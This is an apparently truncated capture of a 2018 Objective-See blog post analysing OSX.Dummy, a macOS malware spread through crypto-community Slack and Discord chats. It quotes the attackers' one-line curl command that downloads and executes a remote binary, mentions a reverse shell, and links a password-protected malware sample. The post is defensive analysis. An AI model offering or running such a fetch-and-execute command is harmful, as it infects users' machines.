Objective See
products malware blog about
OSX.Dummy
new mac malware targets the cryptocurrency community
06/29/2018
Enjoy these blog posts? You can support my writing & tools on patreon! ♡
Early today, Remco Verhoef (@remco_verhoef) posted an interesting entry to SANS 'InfoSec Handlers Diary Blog'.
Titled "Crypto community target of MacOS malware" he noted:
"Previous days we've seen multiple MacOS malware attacks, originating within crypto related Slack or
Discord chats groups by impersonating admins or key people. Small snippets are being shared,
resulting in downloading and executing a malicious binary."
His great writeup notes the initial infection vector and provides an overview of the malware, including its method of
persistence (launch daemon) and purpose (reverse shell).
Here, we dive in a touch deeper into the malware and illustrate how Objective-See's tools can generically thwart this
new threat, at every step of the way!
Want to play along? 👾☠️
I've shared the malware, which can be downloaded here (password: infect3d).
Remco Verhoef states the malware attacks are:
"originating within crypto related Slack or Discord chats groups by impersonating admins or key people.
Small snippets are being shared, resulting in downloading and executing a malicious binary.
Apparently attackers are asking users to infect themselves, via the following command:
$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script
If users fall for this (rather lame social engineering trick, a rather massive machO binary will be downloaded and
executed.
Massive you say? Yes, it clocks in at 34M:
$ du -h /tmp/script 34M script
Using WhatsYourSign, we can see that the malicious binary is not signed:
OSX.Dummy
© 2018 objective-see llc support us!  ✉
Aloha!
Sign up for our newsletter and
notifications about new tools &
blog posts?
Email Address
Subscribe
https://objective-see.com/blog/blog_0x32.html
Page 1 of 1